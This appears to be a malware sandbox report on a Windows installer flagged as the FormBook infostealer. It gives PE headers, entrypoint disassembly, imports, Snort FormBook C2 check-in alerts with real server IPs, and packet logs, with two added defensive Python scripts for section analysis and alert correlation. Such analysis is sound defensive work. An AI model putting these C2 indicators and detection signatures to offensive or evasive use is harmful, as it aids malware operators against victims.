                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                                      File Icon

                                                                      Icon Hash:960d4b6e0f3e3642

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x403348
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:ced282d9b261d1462772017fe2f6972b

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      sub esp, 00000184h
                                                                      push ebx
                                                                      push esi
                                                                      push edi
                                                                      xor ebx, ebx
                                                                      push 00008001h
                                                                      mov dword ptr [esp+18h], ebx
                                                                      mov dword ptr [esp+10h], 0040A198h
                                                                      mov dword ptr [esp+20h], ebx
                                                                      mov byte ptr [esp+14h], 00000020h
                                                                      call dword ptr [004080B8h]
                                                                      call dword ptr [004080BCh]
                                                                      and eax, BFFFFFFFh
                                                                      cmp ax, 00000006h
                                                                      mov dword ptr [0042F42Ch], eax
                                                                      je 00007FE4D08F1223h
                                                                      push ebx
                                                                      call 00007FE4D08F4386h
                                                                      cmp eax, ebx
                                                                      je 00007FE4D08F1219h
                                                                      push 00000C00h
                                                                      call eax
                                                                      mov esi, 004082A0h
                                                                      push esi
                                                                      call 00007FE4D08F4302h
                                                                      push esi
                                                                      call dword ptr [004080CCh]
                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                      cmp byte ptr [esi], bl
                                                                      jne 00007FE4D08F11FDh
push 0000000Bh
call 00007FE4D08F435Ah
push 00000009h
call 00007FE4D08F4353h
push 00000007h
mov dword ptr [0042F424h], eax
call 00007FE4D08F4347h
cmp eax, ebx
je 00007FE4D08F1221h
push 0000001Eh
call eax
test eax, eax
je 00007FE4D08F1219h
or byte ptr [0042F42Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4F8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429850h
call dword ptr [0040816Ch]
push 0040A188h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x21248 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

An empty SECURITY directory means the file carries no Authenticode signature; an empty BASERELOC directory means the image has no relocations and must load at its preferred base.

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6457 | 0x6600 | False | 0.66823682598 | data | 6.43498570321 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1380 | 0x1400 | False | 0.4625 | data | 5.26100389731 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x25538 | 0x600 | False | 0.463541666667 | data | 4.133728555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x38000 | 0x21248 | 0x21400 | False | 0.430987135808 | data | 6.43392115595 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
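Two rows in that table deserve a second look: .data has a virtual size of 0x25538 against only 0x600 bytes of file data, and .ndata has no file data at all but is writable (the .ndata name is the one NSIS installers use for their run-time data area). The script below is an added example, not part of the report or of any tool it names: it parses an IMAGE_SECTION_HEADER array with the standard library, applies the checks an analyst runs on each row (virtual size far above raw size, writable sections with no file data, write+execute, alignment), and computes the Shannon entropy shown in the report's Entropy column. The PE header blob is constructed from the five rows above; PointerToRawData values are assumed because the report does not list them, and entropy is demonstrated on constructed buffers rather than the sample's bytes.

```python
"""Section-table checks for a PE like the one summarised above: parse the
IMAGE_SECTION_HEADER array with the stdlib, flag the rows an analyst looks at
(virtual size far above raw size, writable sections with no file data, W+X),
and compute Shannon entropy, the figure in the report's Entropy column."""
import math
import struct

IMAGE_SCN_CNT_CODE               = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA   = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE            = 0x20000000
IMAGE_SCN_MEM_READ               = 0x40000000
IMAGE_SCN_MEM_WRITE              = 0x80000000

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes

# CONSTRUCTED from the report's section table: name, VirtualAddress,
# VirtualSize, SizeOfRawData, PointerToRawData, Characteristics.
# PointerToRawData is not in the report; the values are ASSUMED (file-aligned, in order).
REPORT_SECTIONS = [
    (b".text",  0x1000,  0x6457,  0x6600,  0x400,  IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ),
    (b".rdata", 0x8000,  0x1380,  0x1400,  0x6a00, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b".data",  0xa000,  0x25538, 0x600,   0x7e00, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ),
    (b".ndata", 0x30000, 0x8000,  0x0,     0x0,    IMAGE_SCN_MEM_WRITE | IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b".rsrc",  0x38000, 0x21248, 0x21400, 0x8400, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
]


def build_pe_headers(sections):
    """Minimal PE32 header blob (DOS header, PE signature, COFF header,
    optional header, section table) with no section data, constructed so the
    parser below has something to read offline."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                 # SectionAlignment, FileAlignment
    table = b"".join(SECTION_HDR.pack(n.ljust(8, b"\x00"), vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, va, vs, rs, rp, ch in sections)
    return dos + b"PE\x00\x00" + coff + bytes(opt) + table


def parse_sections(pe):
    """Walk the section table; one dict per IMAGE_SECTION_HEADER."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]            # COFF.NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]       # COFF.SizeOfOptionalHeader
    off = e_lfanew + 24 + opt_size                                  # section table follows the optional header
    out = []
    for _ in range(nsec):
        name, vs, va, rs, rp, _, _, _, _, ch = SECTION_HDR.unpack_from(pe, off)
        out.append({"name": name.rstrip(b"\x00").decode("ascii", "replace"),
                    "va": va, "vsize": vs, "rawsize": rs, "rawptr": rp, "chars": ch})
        off += SECTION_HDR.size
    return out


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def section_findings(sec, section_align=0x1000):
    """The checks an analyst runs on each row of a section table."""
    ch, found = sec["chars"], []
    if ch & IMAGE_SCN_MEM_WRITE and ch & IMAGE_SCN_MEM_EXECUTE:
        found.append("writable and executable")
    if sec["rawsize"] == 0 and ch & IMAGE_SCN_MEM_WRITE:
        found.append("no file data, writable: filled at run time")
    if sec["rawsize"] and sec["vsize"] > 4 * sec["rawsize"]:
        found.append("virtual size %#x far above raw size %#x: grows at run time"
                     % (sec["vsize"], sec["rawsize"]))
    if sec["va"] % section_align:
        found.append("VirtualAddress not section-aligned")
    return found


def analyze(pe):
    """Map section name -> list of findings."""
    return {s["name"]: section_findings(s) for s in parse_sections(pe)}


PE_IMAGE = build_pe_headers(REPORT_SECTIONS)

if __name__ == "__main__":
    for s in parse_sections(PE_IMAGE):
        print("%-6s va=%#07x vsize=%#07x raw=%#07x %s"
              % (s["name"], s["va"], s["vsize"], s["rawsize"], "; ".join(section_findings(s)) or "ok"))
    # Entropy on constructed buffers; the report's column is computed over the real section bytes.
    print("uniform:", shannon_entropy(bytes(range(256)) * 4), "constant:", shannon_entropy(b"A" * 1024))
```

On a real file, read the bytes from disk and pass them to `analyze`; the checks only need the headers, so the first few kilobytes are enough, while `shannon_entropy` should be run over each section's slice `pe[rawptr:rawptr+rawsize]`.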

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x38280 | 0x10828 | data | English | United States
RT_ICON | 0x48aa8 | 0x849d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x50f48 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4293848814, next used block 4294638330 | English | United States
RT_ICON | 0x55170 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294046193, next used block 4294638330 | English | United States
RT_ICON | 0x57718 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294309365, next used block 4294375158 | English | United States
RT_ICON | 0x587c0 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x58c28 | 0x100 | data | English | United States
RT_DIALOG | 0x58d28 | 0x11c | data | English | United States
RT_DIALOG | 0x58e48 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x58ea8 | 0x5a | data | English | United States
RT_MANIFEST | 0x58f08 | 0x340 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

The "dBase IV DBT" and "GLS_BINARY_LSB_FIRST" types are libmagic guesses on raw icon bitmap (DIB) data, which has no file header of its own; they do not indicate embedded database files.

Imports

DLL | Import
ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/12/21-06:10:52.777667 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49716 | 75.2.115.196 | 192.168.2.5
05/12/21-06:10:57.964155 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 91.148.168.141
05/12/21-06:10:57.964155 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 91.148.168.141
05/12/21-06:10:57.964155 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 91.148.168.141
05/12/21-06:10:58.051840 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49717 | 91.148.168.141 | 192.168.2.5
05/12/21-06:11:08.305754 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.5 | 62.149.189.71
05/12/21-06:11:08.305754 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.5 | 62.149.189.71
05/12/21-06:11:08.305754 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.5 | 62.149.189.71
05/12/21-06:11:13.647635 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49719 | 23.227.38.74 | 192.168.2.5
05/12/21-06:11:18.796605 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49720 | 80 | 192.168.2.5 | 85.233.160.22
05/12/21-06:11:18.796605 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49720 | 80 | 192.168.2.5 | 85.233.160.22
05/12/21-06:11:18.796605 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49720 | 80 | 192.168.2.5 | 85.233.160.22
05/12/21-06:11:30.171286 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.5 | 8.210.40.49
05/12/21-06:11:30.171286 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.5 | 8.210.40.49
05/12/21-06:11:30.171286 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.5 | 8.210.40.49
05/12/21-06:11:45.772072 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.5 | 34.102.136.180
05/12/21-06:11:45.772072 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.5 | 34.102.136.180
05/12/21-06:11:45.772072 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.5 | 34.102.136.180
05/12/21-06:11:45.909532 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49727 | 34.102.136.180 | 192.168.2.5
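Three things stand out in that alert list: the three ET SIDs fire on the same request packet (one check-in, not three), the check-ins go to a different host roughly every 10 to 15 seconds, and some servers answer 403 on flows where no check-in rule fired at all (75.2.115.196, 23.227.38.74). The script below is an added example, not part of the report or of the Emerging Threats ruleset: it parses Snort fast-format alert lines, folds duplicate SIDs per flow, pairs each check-in with the server's 403 on the same flow, reports 403s that had no matching check-in, and measures the interval between attempts. The alert lines are constructed from the table above; the rule revision numbers and priorities in them are placeholders.

```python
"""Correlate Snort fast-format alerts for a check-in pattern like the one
above: fold the three ET FormBook SIDs that fire on one request, pair each
request with the server's 403 on the same flow, list 403s without a matching
check-in, and measure the cadence between attempts."""
import re
from collections import OrderedDict
from datetime import datetime

CHECKIN_SIDS = {2031412, 2031449, 2031453}   # ET TROJAN FormBook CnC Checkin (GET)
SID_403 = 1201                               # ATTACK-RESPONSES 403 Forbidden

# Snort "fast" alert line: timestamp [**] [gid:sid:rev] msg [**] ... {proto} src:port -> dst:port
FAST_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\].*?"
    r"\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s*$")

# CONSTRUCTED from the alert table above; rev and priority values are placeholders.
SAMPLE_ALERTS = """\
05/12/21-06:10:52.777667  [**] [1:1201:1] ATTACK-RESPONSES 403 Forbidden [**] [Priority: 2] {TCP} 75.2.115.196:80 -> 192.168.2.5:49716
05/12/21-06:10:57.964155  [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Priority: 1] {TCP} 192.168.2.5:49717 -> 91.148.168.141:80
05/12/21-06:10:57.964155  [**] [1:2031449:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Priority: 1] {TCP} 192.168.2.5:49717 -> 91.148.168.141:80
05/12/21-06:10:57.964155  [**] [1:2031412:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Priority: 1] {TCP} 192.168.2.5:49717 -> 91.148.168.141:80
05/12/21-06:10:58.051840  [**] [1:1201:1] ATTACK-RESPONSES 403 Forbidden [**] [Priority: 2] {TCP} 91.148.168.141:80 -> 192.168.2.5:49717
05/12/21-06:11:08.305754  [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Priority: 1] {TCP} 192.168.2.5:49718 -> 62.149.189.71:80
05/12/21-06:11:13.647635  [**] [1:1201:1] ATTACK-RESPONSES 403 Forbidden [**] [Priority: 2] {TCP} 23.227.38.74:80 -> 192.168.2.5:49719
05/12/21-06:11:18.796605  [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Priority: 1] {TCP} 192.168.2.5:49720 -> 85.233.160.22:80
05/12/21-06:11:30.171286  [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Priority: 1] {TCP} 192.168.2.5:49725 -> 8.210.40.49:80
05/12/21-06:11:45.772072  [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Priority: 1] {TCP} 192.168.2.5:49727 -> 34.102.136.180:80
05/12/21-06:11:45.909532  [**] [1:1201:1] ATTACK-RESPONSES 403 Forbidden [**] [Priority: 2] {TCP} 34.102.136.180:80 -> 192.168.2.5:49727
"""


def parse_fast_alert(line):
    """One Snort fast-format line -> dict, or None if the line does not match."""
    m = FAST_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    return {"ts": datetime.strptime(d["ts"], "%m/%d/%y-%H:%M:%S.%f"),
            "sid": int(d["sid"]), "msg": d["msg"], "proto": d["proto"],
            "src": d["src"], "sport": int(d["sport"]),
            "dst": d["dst"], "dport": int(d["dport"])}


def correlate(lines, victim):
    """Returns (flows, unmatched_403). flows: ordered check-in records keyed by
    the victim's source port and the C2 host, duplicate SIDs folded, with the
    403 from the same flow attached. unmatched_403: servers that answered 403
    on a flow where no check-in rule fired."""
    flows, unmatched = OrderedDict(), []
    for line in lines:
        a = parse_fast_alert(line)
        if a is None:
            continue
        if a["sid"] in CHECKIN_SIDS and a["src"] == victim:
            key = (a["sport"], a["dst"], a["dport"])
            rec = flows.setdefault(key, {"c2": a["dst"], "first": a["ts"],
                                         "sids": set(), "got_403": False})
            rec["sids"].add(a["sid"])
        elif a["sid"] == SID_403 and a["dst"] == victim:
            key = (a["dport"], a["src"], a["sport"])       # same flow, reverse direction
            if key in flows:
                flows[key]["got_403"] = True
            else:
                unmatched.append(a["src"])
    return list(flows.values()), unmatched


def beacon_intervals(flows):
    """Seconds between consecutive check-ins, in time order."""
    ts = sorted(f["first"] for f in flows)
    return [round((b - a).total_seconds(), 3) for a, b in zip(ts, ts[1:])]


if __name__ == "__main__":
    flows, orphan = correlate(SAMPLE_ALERTS.splitlines(), "192.168.2.5")
    for f in flows:
        print(f["first"].time(), f["c2"], sorted(f["sids"]), "403" if f["got_403"] else "no 403 seen")
    print("403 without a check-in alert:", orphan)
    print("intervals (s):", beacon_intervals(flows))
```

The unmatched 403s are the rows worth chasing in the packet capture: the sample contacted those hosts too, but the request did not match the check-in signatures, so a detection built only on the ET SIDs would undercount the hosts the sample tried.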

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2021 06:10:52.578253031 CEST | 49716 | 80 | 192.168.2.5 | 75.2.115.196
May 12, 2021 06:10:52.618907928 CEST | 80 | 49716 | 75.2.115.196 | 192.168.2.5
May 12, 2021 06:10:52.620045900 CEST | 49716 | 80 | 192.168.2.5 | 75.2.115.196
May 12, 2021 06:10:52.620214939 CEST | 49716 | 80 | 192.168.2.5 | 75.2.115.196
May 12, 2021 06:10:52.660700083 CEST | 80 | 49716 | 75.2.115.196 | 192.168.2.5
May 12, 2021 06:10:52.777667046 CEST | 80 | 49716 | 75.2.115.196 | 192.168.2.5
May 12, 2021 06:10:52.777733088 CEST | 80 | 49716 | 75.2.115.196 | 192.168.2.5
May 12, 2021 06:10:52.778031111 CEST | 49716 | 80 | 192.168.2.5 | 75.2.115.196
May 12, 2021 06:10:52.778270006 CEST | 49716 | 80 | 192.168.2.5 | 75.2.115.196
May 12, 2021 06:10:52.807538986 CEST | 80 | 49716 | 75.2.115.196 | 192.168.2.5
May 12, 2021 06:10:52.807683945 CEST | 49716 | 80 | 192.168.2.5 | 75.2.115.196
May 12, 2021 06:10:52.818757057 CEST | 80 | 49716 | 75.2.115.196 | 192.168.2.5
May 12, 2021 06:10:57.887156010 CEST | 49717 | 80 | 192.168.2.5 | 91.148.168.141
May 12, 2021 06:10:57.963726997 CEST | 80 | 49717 | 91.148.168.141 | 192.168.2.5
May 12, 2021 06:10:57.963977098 CEST | 49717 | 80 | 192.168.2.5 | 91.148.168.141
May 12, 2021 06:10:57.964154959 CEST | 49717 | 80 | 192.168.2.5 | 91.148.168.141
May 12, 2021 06:10:58.044265032 CEST | 80 | 49717 | 91.148.168.141 | 192.168.2.5
May 12, 2021 06:10:58.051840067 CEST | 80 | 49717 | 91.148.168.141 | 192.168.2.5
May 12, 2021 06:10:58.051858902 CEST | 80 | 49717 | 91.148.168.141 | 192.168.2.5
May 12, 2021 06:10:58.052031040 CEST | 49717 | 80 | 192.168.2.5 | 91.148.168.141
May 12, 2021 06:10:58.052119970 CEST | 49717 | 80 | 192.168.2.5 | 91.148.168.141
May 12, 2021 06:10:58.128576040 CEST | 80 | 49717 | 91.148.168.141 | 192.168.2.5
May 12, 2021 06:11:08.246844053 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:08.305356979 CEST | 80 | 49718 | 62.149.189.71 | 192.168.2.5
May 12, 2021 06:11:08.305533886 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:08.305753946 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:08.362505913 CEST | 80 | 49718 | 62.149.189.71 | 192.168.2.5
May 12, 2021 06:11:08.363512993 CEST | 80 | 49718 | 62.149.189.71 | 192.168.2.5
May 12, 2021 06:11:08.363538980 CEST | 80 | 49718 | 62.149.189.71 | 192.168.2.5
May 12, 2021 06:11:08.363763094 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:08.363837004 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:08.665510893 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:09.275211096 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:10.478286028 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:12.884835958 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:13.437242985 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:13.482142925 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.482316017 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:13.482528925 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:13.526175022 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.647634983 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.647696972 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.647722960 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.647748947 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.647768021 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.647921085 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:13.648022890 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.648037910 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:13.648087978 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:13.651108027 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.651184082 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:17.697598934 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:18.743036985 CEST | 49720 | 80 | 192.168.2.5 | 85.233.160.22
May 12, 2021 06:11:18.795769930 CEST | 80 | 49720 | 85.233.160.22 | 192.168.2.5
May 12, 2021 06:11:18.796403885 CEST | 49720 | 80 | 192.168.2.5 | 85.233.160.22
May 12, 2021 06:11:18.796605110 CEST | 49720 | 80 | 192.168.2.5 | 85.233.160.22
May 12, 2021 06:11:18.848905087 CEST | 80 | 49720 | 85.233.160.22 | 192.168.2.5
May 12, 2021 06:11:18.849797010 CEST | 80 | 49720 | 85.233.160.22 | 192.168.2.5
May 12, 2021 06:11:18.849983931 CEST | 80 | 49720 | 85.233.160.22 | 192.168.2.5
May 12, 2021 06:11:18.850141048 CEST | 49720 | 80 | 192.168.2.5 | 85.233.160.22
May 12, 2021 06:11:18.850188017 CEST | 49720 | 80 | 192.168.2.5 | 85.233.160.22
